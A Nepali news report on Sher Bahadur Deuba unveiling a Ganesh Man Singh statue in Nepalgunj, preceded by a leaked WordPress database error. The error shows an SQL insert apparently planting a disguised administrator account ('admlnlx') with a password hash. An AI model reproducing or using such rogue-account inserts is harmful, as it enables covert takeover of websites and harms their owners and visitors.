WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BLBcK8OJM.CF/CCCqSwBiOheFvk0El/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 02:28:18', '', 'admlnlx', 'admlnlx')
नेपालगन्ज, माघ ११-
नेपाली काँग्रेसका सभापति शेरबहादुर देउवाले नेपालगन्जको सुर्खेत सडकखण्डमा स्थापित लौहपुरुष गणेशमान सिंहको पूर्ण कदको शालिक आज अनावरण गर्नुभएको छ । त्यस अवसरमा उहाँले लोकतन्त्रका लागि सिंहले देखाएको बाटामा हिँड्न सके मुलुकको विकास र समृद्धि छिट्टै हुने विश्वास व्यक्त गर्नुभयो । संविधान संशोधनले मधेसको भावनाको कदर हुने बताउँदै उहाँले संशोधनका पक्षमा आउन सबै राजनीतिक दललाई आह्वान गर्नुभयो ।
निर्वाचनमा सबै दल सहभागी हुनुपर्नेमा जोड दिँदै उहाँले संविधानको सफल कार्यान्वयनका लागि निर्वाचन एक मात्र विकल्प हो भन्नुभयो । काँग्रेसका नेता एवम् गणेशमानसिंह फाउन्डेसका अध्यक्ष प्रकाशमान सिंहले नेता गणेशमान सबै नेपालीको साझा सम्पत्ति हुन् भन्नुभयो । जिल्ला अध्यक्ष किरण कोइरालाको सभापतित्वमा भएको समारोहमा सो दलका केन्द्रीय सदस्य किशोरसिंह राठौर, सांसद बादशाह कुर्मी, अञ्जना गुरुङ, सर्वताआलम खान, सञ्जय गौतम र नेकपा (माओवादी केन्द्र)का केन्द्रीय सदस्य दामोदर आचार्यले पनि राजनीतिज्ञ सिंहको योगदानबारे चर्चा गर्नुभएको थियो । रासस